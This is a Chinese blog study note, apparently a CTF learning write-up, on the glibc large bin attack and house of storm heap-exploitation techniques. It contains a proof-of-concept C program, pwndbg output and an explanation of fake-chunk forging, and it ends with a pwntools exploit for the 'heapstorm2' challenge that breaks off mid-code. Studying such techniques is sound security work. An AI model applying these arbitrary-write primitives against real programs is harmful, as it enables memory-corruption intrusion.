<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="Large    Bin    Attack好耶，又是另一个链表的利用🤢🤢。 没太看懂，再去看看 有点看懂了，回来记录一下 largebin结构123456789101112struct malloc_chunk &amp;#123;  INTERNAL_SIZE_T      prev_size;  &#x2F;* Size of previous chunk (if free).  *&#x2F;  INTERNAL">
<meta property="og:type" content="article">
<meta property="og:title" content="large bin attack">
<meta property="og:url" content="http://example.com/2021/11/25/large-bin-attack/index.html">
<meta property="og:site_name" content="study">
<meta property="og:description" content="Large    Bin    Attack好耶，又是另一个链表的利用🤢🤢。 没太看懂，再去看看 有点看懂了，回来记录一下 largebin结构123456789101112struct malloc_chunk &amp;#123;  INTERNAL_SIZE_T      prev_size;  &#x2F;* Size of previous chunk (if free).  *&#x2F;  INTERNAL">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="c:/Users/张鹏/AppData/Roaming/Typora/typora-user-images/image-20211119155541141.png">
<meta property="article:published_time" content="2021-11-25T13:30:31.000Z">
<meta property="article:modified_time" content="2021-11-25T13:31:02.072Z">
<meta property="article:author" content="rootzhang">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:/Users/张鹏/AppData/Roaming/Typora/typora-user-images/image-20211119155541141.png">

<link rel="canonical" href="http://example.com/2021/11/25/large-bin-attack/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>large bin attack | study</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">study</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/11/25/large-bin-attack/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="rootzhang">
      <meta itemprop="description" content="我的博客">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="study">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          large bin attack
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2021-11-25 21:30:31 / 修改时间：21:31:02" itemprop="dateCreated datePublished" datetime="2021-11-25T21:30:31+08:00">2021-11-25</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="Large-Bin-Attack"><a href="#Large-Bin-Attack" class="headerlink" title="Large    Bin    Attack"></a>Large    Bin    Attack</h1><p>好耶，又是另一个链表的利用🤢🤢。</p>
<p>没太看懂，再去看看</p>
<p>有点看懂了，回来记录一下</p>
<h3 id="largebin结构"><a href="#largebin结构" class="headerlink" title="largebin结构"></a>largebin结构</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">malloc_chunk</span> &#123;</span></span><br><span class="line"></span><br><span class="line">  INTERNAL_SIZE_T      prev_size;  <span class="comment">/* Size of previous chunk (if free).  */</span></span><br><span class="line">  INTERNAL_SIZE_T      size;       <span class="comment">/* Size in bytes, including overhead. */</span></span><br><span class="line"></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> <span class="title">malloc_chunk</span>* <span class="title">fd</span>;</span>         <span class="comment">/* double links -- used only if free. */</span></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> <span class="title">malloc_chunk</span>* <span class="title">bk</span>;</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">/* Only used for large blocks: pointer to next larger size.  */</span></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> <span class="title">malloc_chunk</span>* <span class="title">fd_nextsize</span>;</span> <span class="comment">/* double links -- used only if free. */</span></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> <span class="title">malloc_chunk</span>* <span class="title">bk_nextsize</span>;</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>可见largebin的空闲堆结构和fastbin的结构大不一样，有了<code>fd_nextsize</code>和<code>bk_nextsize</code>两个地址空间，因为有了这两个地址空间，储存chunk时也变得不一样，不是简单的单链表和双向链表，具体结构如下图</p>
<p><img src="C:\Users\张鹏\AppData\Roaming\Typora\typora-user-images\image-20211119155541141.png" alt="image-20211119155541141"></p>
<p>可见是一个横向和纵向的结构，横向记录着不同大小的chunk，用<code>fd_nextsize</code>和<code>bk_nextsize</code>连接，大小排序是从大到小，纵向是记录着相同大小的chunk，不同的chunk用fd和bk连接，这样的话，一条largebin链（一条largebin的链表记录的chunk的大小不是固定的，而是一定范围）中又分了不同大小chunk的链表，这些链表的堆头都还是链接的，这样做可以加快寻找空闲chunk的速度。</p>
<p>插入largebin链的步骤</p>
<p>​    1.找到当前要插入的chunk对应的largebin的index，并定位该index中的最小的chunkbck和最大的chunkfwd。<br>​    2.如果fwd等于bck，表明当前链表为空，则直接将该chunk插入，并设置该chunk为该大小堆块的堆头，将bk_nextsize和fd_nextsize赋值为它本身。<br>​    3.如果fwd不等于bck，表明当前链表已经存在chunk，要做的就是找到当前chunk对应的位置将其插入。首先判断其大小是否小于最小chunk的size，(size) &lt; (bck-&gt;bk-&gt;size)，如果小于则说明该chunk为当前链表中最小的chunk，即插入位置在链表末尾，无需遍历链表，直接插入到链表的末尾，且该chunk没有对应的堆头，设置该chunk为相应堆大小堆的堆头，将bk_nextsize指向比它大的堆头，fd_nextsize指向双链表的第一个节点即最大的堆头。<br>​    4.如果当前chunk的size不是最小的chunk，则从双链表的第一个节点即最大的chunk的堆头开始遍历，通过fd_nextsize进行遍历，由于fd_nextsize指向的是比当前堆头小的堆头，因此可以加快遍历速度。直到找到小于等于要插入的chunk的size。<br>​    5.如果找到的chunk的size等于要插入chunk的size，则说明当前要插入的chunk的size已经存在堆头，那么只需将该chunk插入到堆头的下一个节点。<br>​    6.如果找到的chunk的size小于当前要插入chunk的size，则说明当前插入的chunk不存在堆头，因此该chunk会成为堆头插入到该位置，设置fd_nextsize与bk_nextsize。</p>
<h3 id="Large-bin-Attack"><a href="#Large-bin-Attack" class="headerlink" title="Large    bin     Attack"></a>Large    bin     Attack</h3><p>1.利用条件</p>
<p>​    存在UAF或者其他漏洞能够修改同一个Largebin或者bk_nextsize</p>
<p>2.效果</p>
<p>任意地址写入堆地址（重点）</p>
<p>利用下面这段代码进行漏洞复现</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;assert.h&gt;</span></span></span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> stack_var1 = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> stack_var2 = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> *p1 = <span class="built_in">malloc</span>(<span class="number">0x100</span>);</span><br><span class="line">    <span class="built_in">malloc</span>(<span class="number">0x20</span>);<span class="comment">//防止合并</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> *p2 = <span class="built_in">malloc</span>(<span class="number">0x400</span>);</span><br><span class="line">    <span class="built_in">malloc</span>(<span class="number">0x20</span>);<span class="comment">//防止合并</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> *p3 = <span class="built_in">malloc</span>(<span class="number">0x410</span>);</span><br><span class="line">    <span class="built_in">malloc</span>(<span class="number">0x20</span>);<span class="comment">//防止合并</span></span><br><span class="line"> </span><br><span class="line">    <span class="built_in">free</span>(p1);</span><br><span class="line">    <span class="built_in">free</span>(p2);</span><br><span class="line"><span class="comment">//触发malloc_consolidate,之后p1的剩余部分在unsortedbin中,p2在largebin中</span></span><br><span class="line">    <span class="built_in">malloc</span>(<span class="number">0x40</span>);</span><br><span class="line"><span class="comment">//将p3放入unsortedbin中</span></span><br><span class="line">    <span class="built_in">free</span>(p3);</span><br><span class="line"></span><br><span class="line">    p2[<span class="number">0</span>] = <span class="number">0</span>;<span class="comment">//fd</span></span><br><span class="line">    p2[<span class="number">1</span>] = (<span class="keyword">unsigned</span> <span class="keyword">long</span>)(&amp;stack_var1 - <span class="number">2</span>);<span class="comment">//bk</span></span><br><span class="line">	p2[<span class="number">2</span>] = <span class="number">0</span>;<span class="comment">//fd_nextsize</span></span><br><span class="line">    p2[<span class="number">3</span>] = (<span class="keyword">unsigned</span> <span class="keyword">long</span>)(&amp;stack_var2 - <span class="number">4</span>);<span class="comment">//bk_nextsize</span></span><br><span class="line"></span><br><span class="line">    <span class="built_in">malloc</span>(<span class="number">0x40</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">&quot;stack_var1 (%p): %p\n&quot;</span>, &amp;stack_var1, (<span class="keyword">void</span> *)stack_var1);</span><br><span class="line">    <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">&quot;stack_var2 (%p): %p\n&quot;</span>, &amp;stack_var2, (<span class="keyword">void</span> *)stack_var2);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>先在free(p3)下断点，查看这时的bins</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">fastbins</span><br><span class="line">0x20: 0x0</span><br><span class="line">0x30: 0x0</span><br><span class="line">0x40: 0x0</span><br><span class="line">0x50: 0x0</span><br><span class="line">0x60: 0x0</span><br><span class="line">0x70: 0x0</span><br><span class="line">0x80: 0x0</span><br><span class="line">unsortedbin</span><br><span class="line">all: 0x602050 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x602050 /* &#x27;P `&#x27; */</span><br><span class="line">smallbins</span><br><span class="line">empty</span><br><span class="line">largebins</span><br><span class="line">0x400: 0x602140 —▸ 0x7ffff7dd1f68 (main_arena+1096) ◂— 0x602140 /* &#x27;@!`&#x27; */</span><br></pre></td></tr></table></figure>

<p>可以看见p1和p2都触发malloc_consolidate，p1到了smallbin,p2到了largebin</p>
<p>查看p2内容</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> x/20gx 0x602140</span></span><br><span class="line">0x602140:	0x0000000000000000	0x0000000000000411</span><br><span class="line">0x602150:	0x00007ffff7dd1f68	0x00007ffff7dd1f68</span><br><span class="line">0x602160:	0x0000000000602140	0x0000000000602140</span><br><span class="line">0x602170:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x602180:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x602190:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x6021a0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x6021b0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x6021c0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x6021d0:	0x0000000000000000	0x0000000000000000</span><br></pre></td></tr></table></figure>

<p>可以看见这时候链表里只有他一个堆且他为堆头，fd_nextsize和bk_nextsize都是自身地址</p>
<p>再把程序运行到malloc(0x40),查看p2内容</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> x/20gx 0x602140</span></span><br><span class="line">0x602140:	0x0000000000000000	0x0000000000000411</span><br><span class="line">0x602150:	0x0000000000000000	0x00007fffffffddc0</span><br><span class="line">0x602160:	0x0000000000000000	0x00007fffffffddb8</span><br><span class="line">0x602170:	0x0000000000000000	0x0000000000000000</span><br></pre></td></tr></table></figure>

<p>可见p2的bk和bk_nextsize地址空间的值都被更改了。都指向了栈空间。</p>
<p>然后执行malloc(0x40)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">───────────────────────────────────[ STACK ]────────────────────────────────────</span><br><span class="line">00:0000│ rsp 0x7fffffffddd0 —▸ 0x602580 ◂— 0x0</span><br><span class="line">01:0008│     0x7fffffffddd8 —▸ 0x602580 ◂— 0x0</span><br><span class="line">02:0010│     0x7fffffffdde0 —▸ 0x602010 —▸ 0x7ffff7dd1c78 (main_arena+344) —▸ 0x7ffff7dd1c68 (main_arena+328) —▸ 0x7ffff7dd1c58 (main_arena+312) ◂— ...</span><br><span class="line">03:0018│     0x7fffffffdde8 —▸ 0x602150 ◂— 0x0</span><br><span class="line">04:0020│     0x7fffffffddf0 —▸ 0x602590 —▸ 0x602140 ◂— 0x0</span><br><span class="line">05:0028│     0x7fffffffddf8 ◂— 0x6262b714a4749e00</span><br><span class="line">06:0030│ rbp 0x7fffffffde00 —▸ 0x4007b0 (__libc_csu_init) ◂— push   r15</span><br><span class="line">07:0038│     0x7fffffffde08 —▸ 0x7ffff7a2d840 (__libc_start_main+240) ◂— mov    </span><br></pre></td></tr></table></figure>

<p>发现栈上的值被更改成堆地址了，至于为什么会这样，且细细道来</p>
<p>先看一下这段代码干了啥</p>
<p>先申请了三个堆，p1是0x100,p2是0x400,p3是0x410</p>
<p>然后free掉p1和p2,再malloc(0x40)，导致p1转移到smallbin 然后p2转移到largebin</p>
<p>修改p2数据p2-&gt;bk=(unsigned long)(&amp;stack_var1 - 2),p2-&gt;bk_nextsize=(unsigned long)(&amp;stack_var2 - 4)</p>
<p>申请0x40chunk触发malloc_consolidate，p3将要链入largebin中</p>
<p>漏洞就在这个时候发挥作用，因为p3要进入largebin的链表，所以要执行入链操作</p>
<p>因为p3大于p2,而p3对应的堆链又是空的情况下就会执行下面这两段代码，其中p3指的是victim，p2指的是fwd,</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">bck = fwd-&gt;bk;</span><br><span class="line">/..../</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line">     victim-&gt;fd_nextsize = fwd;</span><br><span class="line">     victim-&gt;bk_nextsize = fwd-&gt;bk_nextsize;<span class="comment">//这里</span></span><br><span class="line">     fwd-&gt;bk_nextsize = victim;</span><br><span class="line">     victim-&gt;bk_nextsize-&gt;fd_nextsize = victim;<span class="comment">//*(&amp;stack_var2 - 4*0x8+0x20)=*(&amp;stack_var1)=p3</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">victim-&gt;bk = bck;<span class="comment">//p3-&gt;bk=bck</span></span><br><span class="line">victim-&gt;fd = fwd;<span class="comment">//p3-&gt;fd=p2</span></span><br><span class="line">fwd-&gt;bk = victim;</span><br><span class="line">bck-&gt;fd = victim;<span class="comment">//*(&amp;stack_var1 - 2*0x8+0x10)=*(&amp;stack_var1)=p3</span></span><br></pre></td></tr></table></figure>

<p>这样就完成了任意地址写入堆地址。</p>
<h2 id="large-bin-arrack-高级利用"><a href="#large-bin-arrack-高级利用" class="headerlink" title="large bin arrack 高级利用"></a>large bin arrack 高级利用</h2><h2 id="house-of-strom"><a href="#house-of-strom" class="headerlink" title="house of strom"></a>house of strom</h2><p>largebinattack能完成1任意地址写堆地址，但是一般没啥大用，但是largebinsttack的高级利用house of storm却能完成任意地址请求堆</p>
<p>利用house of storm的前置条件</p>
<p>1.能控制一个large bin 的堆的bk_nextsize</p>
<p>2.能控制unsortedbin的一个堆的bk</p>
<p>主要思路就是利用largebinattack来fake一个chunk，然后利用unsortedbin对fake_chunk进行请求。</p>
<h4 id="第一步-伪造堆"><a href="#第一步-伪造堆" class="headerlink" title="第一步 伪造堆"></a>第一步 伪造堆</h4><p>依靠largebinattack完成这一步，伪造堆的话主要伪造两个地方，一个是size,一个是bk位置，size使用bk_nextsize来伪造，bk（fake_chunk）使用bk(指large的bk)来伪造，伪造原理如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">bck = fwd-&gt;bk;</span><br><span class="line">/..../</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line">     victim-&gt;fd_nextsize = fwd;</span><br><span class="line">     victim-&gt;bk_nextsize = fwd-&gt;bk_nextsize;<span class="comment">//这里</span></span><br><span class="line">     fwd-&gt;bk_nextsize = victim;</span><br><span class="line">     victim-&gt;bk_nextsize-&gt;fd_nextsize = victim;<span class="comment">//*(&amp;stack_var2 - 4*0x8+0x20)=*(&amp;stack_var1)=p3</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">victim-&gt;bk = bck;<span class="comment">//p3-&gt;bk=bck</span></span><br><span class="line">victim-&gt;fd = fwd;<span class="comment">//p3-&gt;fd=p2</span></span><br><span class="line">fwd-&gt;bk = victim;</span><br><span class="line">bck-&gt;fd = victim;<span class="comment">//*(&amp;stack_var1 - 2*0x8+0x10)=*(&amp;stack_var1)=p3</span></span><br></pre></td></tr></table></figure>

<p>注意size位不能直接写入这个堆的地址，那样估计太大了，一般来说程序基地址一般是0x55或者0x56开头,堆的地址当然也是这两个开头，可以通过错位的方式使size位只写入堆地址第一个字节，令<code>bk_nextsize=target-0x18-5</code>,这样在执行victim-&gt;bk_nextsize-&gt;fd_nextsize = victim;victim-&gt;bk_nextsize-&gt;fd_nextsize就指向了target-0x18-5+0x20=target+0x8-5,而堆的地址是六个字节，从target+0x8-5处存地址，存完后五个以后首字节就储存在target+0x8处，这个地址刚好是size的地址，size就伪造完了。</p>
<p>在伪造bk之前先搞明白伪造要伪造bk指针</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">unsorted_chunks (av)-&gt;bk = bck;</span><br><span class="line">         <span class="comment">//bck指的是target_chunk-&gt;bk</span></span><br><span class="line">         <span class="comment">//unsortbin的bk指针指向倒数第二个堆块</span></span><br><span class="line">         bck-&gt;fd = unsorted_chunks (av);</span><br><span class="line">         <span class="comment">//需要访问到target_chunk-&gt;bk-&gt;fd,因此target_chunk-&gt;bk需要是有效地址</span></span><br></pre></td></tr></table></figure>

<p>因为fake_chunk在unsorted中脱链时需要访问他的bk地址，向bk地址处储存头结点，所以bk处得是一个有效的值，如果不伪造的这个地方大概率不是有效地址，会导致fake_chunk脱链失败。这就是伪造原因</p>
<p>利用large的bk进行伪造，伪造原理还是上面那个源码，令large-&gt;bk=target+0x8，在执行bck-&gt;fd = victim;时victim的地址就会写入(target+0x8+0x10)=(target-&gt;bk)中去，bk储存着一个堆的地址，当然就是有效地址了。</p>
<h5 id="注意：插入的chunk的值要大于布置的largechun的大小（即插在布置的kargechunk的前面）"><a href="#注意：插入的chunk的值要大于布置的largechun的大小（即插在布置的kargechunk的前面）" class="headerlink" title="注意：插入的chunk的值要大于布置的largechun的大小（即插在布置的kargechunk的前面）"></a>注意：插入的chunk的值要大于布置的largechun的大小（即插在布置的kargechunk的前面）</h5><h4 id="第二步-申请fake-chunk"><a href="#第二步-申请fake-chunk" class="headerlink" title="第二步 申请fake_chunk"></a>第二步 申请fake_chunk</h4><p>申请fake_chunk实际上就是伪造完自己执行的，unsorted在把上一个尾结点脱链后（插到了large,完成布置），然后再找尾结点，这时尾结点就是伪造的fake_chunk,然后执行下面代码脱链</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">unsorted_chunks (av)-&gt;bk = bck;</span><br><span class="line">         <span class="comment">//bck指的是target_chunk-&gt;bk</span></span><br><span class="line">         <span class="comment">//unsortbin的bk指针指向倒数第二个堆块</span></span><br><span class="line">         bck-&gt;fd = unsorted_chunks (av);</span><br><span class="line">         <span class="comment">//需要访问到target_chunk-&gt;bk-&gt;fd,因此target_chunk-&gt;bk需要是有效地址</span></span><br></pre></td></tr></table></figure>

<p>注意布置的fake_chunk的size是0x55或者0x56，所以申请的堆的大小得是0x50。</p>
<p>此时就完成了任意地址申请堆了。可以靠这个堆改写储存堆地址的指针区，完成任意地址读写。</p>
<p>例题heapstorm2</p>
<p>这道题先放一个payload,因为还涉及off by null漏洞，所以在off by null中仔细分析</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> os <span class="keyword">import</span> system</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">elf=ELF(<span class="string">&#x27;./heapstorm2&#x27;</span>)</span><br><span class="line">libc=ELF(<span class="string">&#x27;/lib/x86_64-linux-gnu/libc.so.6&#x27;</span>)</span><br><span class="line">ogg=[<span class="number">0x45226</span>,<span class="number">0x4527a</span>,<span class="number">0xf03a4</span>,<span class="number">0xf1247</span>]</span><br><span class="line"><span class="function"><span 